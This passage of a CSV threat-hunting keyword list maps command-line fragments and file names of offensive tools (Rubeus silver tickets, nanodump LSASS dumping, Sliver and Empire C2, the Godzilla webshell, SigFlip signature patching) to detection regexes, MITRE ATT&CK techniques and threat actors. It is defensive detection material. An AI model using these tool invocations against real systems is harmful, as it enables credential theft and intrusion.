sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","3128" "* sigflip.x86.*",".{0,1000}\ssigflip\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","3129" "* SigLoader *",".{0,1000}\sSigLoader\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","3130" "* --sign-domain *",".{0,1000}\s\-\-sign\-domain\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","3131" "* --sign-steal 
*",".{0,1000}\s\-\-sign\-steal\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","3132" "* sigthief.py*",".{0,1000}\ssigthief\.py.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","3133" "* Sigwhatever*",".{0,1000}\sSigwhatever.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker 
- RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","3134" "* --silent -obf NixImports -o /tmp/*",".{0,1000}\s\-\-silent\s\-obf\sNixImports\s\-o\s\/tmp\/.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","3135" "* --silent-process-exit *",".{0,1000}\s\-\-silent\-process\-exit\s.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","3136" "* silenttrinity.*",".{0,1000}\ssilenttrinity\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","3137" "* silver * /domain*",".{0,1000}\ssilver\s.{0,1000}\s\/domain.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","3138" "* silver * /ldap *",".{0,1000}\ssilver\s.{0,1000}\s\/ldap\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","3139" "* silver * /passlastset *",".{0,1000}\ssilver\s.{0,1000}\s\/passlastset\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","3140" "* silver * /service:*",".{0,1000}\ssilver\s.{0,1000}\s\/service\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","3141" "* simpleLoader.c -z execstack*",".{0,1000}\ssimpleLoader\.c\s\-z\sexecstack.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","3142" "* --single shadow.hashes*",".{0,1000}\s\-\-single\sshadow\.hashes.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","3143" "* --single-argument https://github.com/BeichenDream/Godzilla*",".{0,1000}\s\-\-single\-argument\shttps\:\/\/github\.com\/BeichenDream\/Godzilla.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","3144" "* sip-brute.nse*",".{0,1000}\ssip\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3145" "* sip-call-spoof.nse*",".{0,1000}\ssip\-call\-spoof\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3146" "* sip-enum-users.nse*",".{0,1000}\ssip\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3147" "* sip-log4shell.nse*",".{0,1000}\ssip\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","N/A","4","351","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z","3148" "* sip-methods.nse*",".{0,1000}\ssip\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3149" "* SirepRAT.py*",".{0,1000}\sSirepRAT\.py.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","3150" "* sish/deploy *",".{0,1000}\ssish\/deploy\s.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","3153" "* sitadel.py*",".{0,1000}\ssitadel\.py.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","3154" "* -SiteListFilePath * -B64Pass *",".{0,1000}\s\-SiteListFilePath\s.{0,1000}\s\-B64Pass\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Get-System.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3155" "* --skip-crawl*",".{0,1000}\s\-\-skip\-crawl.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","3156" "*- --skippasswordcheck*",".{0,1000}\-\s\-\-skippasswordcheck.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for 
BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","3157" "* --skipregistryloggedon*",".{0,1000}\s\-\-skipregistryloggedon.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","3158" "* skypev2-version.nse*",".{0,1000}\sskypev2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3159" "*----- SLEEP HOOK -----*",".{0,1000}\-\-\-\-\-\sSLEEP\sHOOK\s\-\-\-\-\-.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","N/A","10","","N/A","","","","3160" "* slinky.py*",".{0,1000}\/slinky\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3161" "* slip.py *",".{0,1000}\sslip\.py\s.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","0","N/A","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","3162" "* sliver sliver*",".{0,1000}\ssliver\ssliver.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - 
TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","3163" "* sliver.exe*",".{0,1000}\ssliver\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","3164" "* sliver_pb2.py*",".{0,1000}\ssliver_pb2\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","3165" "* sliver_pb2_grpc.py*",".{0,1000}\ssliver_pb2_grpc\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","3166" "* sliver-client.exe*",".{0,1000}\ssliver\-client\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","3167" "* sliver-client_windows.exe*",".{0,1000}\ssliver\-client_windows\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","3168" "* sliver-client_windows-386*.exe*",".{0,1000}\ssliver\-client_windows\-386.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 